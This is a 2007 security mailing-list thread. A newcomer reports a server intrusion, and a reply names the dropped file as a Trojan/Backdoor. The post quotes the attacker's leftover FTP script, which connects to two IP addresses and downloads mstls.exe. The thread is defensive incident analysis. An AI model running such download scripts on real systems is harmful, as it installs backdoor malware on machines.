Security Basics mailing list archives

Re: what next

From: Justin <winopride () gmail com>
Date: Tue, 06 Feb 2007 08:18:30 -0700

nemanja.janic () centroproizvod co yu wrote:

Hello list,
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no 
extension) which contained the following lines:
open 80.93.223.22 14547user 1 1get mstls.exequitopen 80.71.219.134 5191user 1 1get mstls.exequit
I figure this is some script to be used with ftp, or at least i think so.I did tracert to those adresses, but that's where i'm stuck. What can i do next?And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size.Thanx in advance.

http://www.greatis.com/appdata/d/m/mstls.exe.htm -- Trojan/Backdoor


The file is an FTP script to StnyFtpd (for the ip address: 80.93.223.22).

Goodluck
-Justin

Current thread:

what next nemanja . janic (Feb 06)
- Re: what next Justin (Feb 06)
  - RE: what next Murda Mcloud (Feb 07)
- RE: what next Devin Rambo (Feb 07)
- RE: what next Roger A. Grimes (Feb 07)
- Re: what next jhori (Feb 07)
- Re: what next etropos (Feb 07)
- <Possible follow-ups>
- Re: what next hackman (Feb 06)
- Re: what next RunandHide (Feb 06)
- Re: RE: what next nemanja . janic (Feb 07)
- Re: Re: RE: what next nemanja . janic (Feb 12)